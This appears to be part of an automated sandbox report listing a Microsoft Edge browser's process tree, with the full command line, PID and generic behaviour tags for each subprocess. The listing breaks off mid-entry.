"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeeb343cb8,0x7ffeeb343cc8,0x7ffeeb343cd8
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
  2⤵
  PID:4156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:2188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
  2⤵
  PID:1452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
  2⤵
  PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
  2⤵
  PID:3268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
  2⤵
  PID:1468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
  2⤵
  PID:3944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4676 /prefetch:8
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5980 /prefetch:8
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5040 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
  2⤵
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:1144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
  2⤵
  PID:4164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
  2⤵
  PID:3896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
  2⤵
  PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7896 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8072 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8080 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1
  2⤵
  PID:3800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1
  2⤵
  PID:788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8464 /prefetch:1
  2⤵
  PID:4032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9312 /prefetch:1
  2⤵
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9864 /prefetch:1
  2⤵
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=10036 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10344 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9612 /prefetch:1
  2⤵
  PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10216 /prefetch:1
  2⤵
  PID:6160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11208 /prefetch:1
  2⤵
  PID:6324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11156 /prefetch:1
  2⤵
  PID:6428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:1
  2⤵
  PID:6436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11052 /prefetch:1
  2⤵
  PID:6444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11040 /prefetch:1
  2⤵
  PID:6452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11020 /prefetch:1
  2⤵
  PID:6460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11032 /prefetch:1
  2⤵
  PID:6468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10004 /prefetch:1
  2⤵
  PID:6476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9288 /prefetch:1
  2⤵
  PID:6488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10916 /prefetch:1
  2⤵
  PID:6496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9656 /prefetch:1
  2⤵
  PID:6356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:5484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15370108290821516252,2326353101298908873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11092 /prefetch:1
  2⤵
  PID:6436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
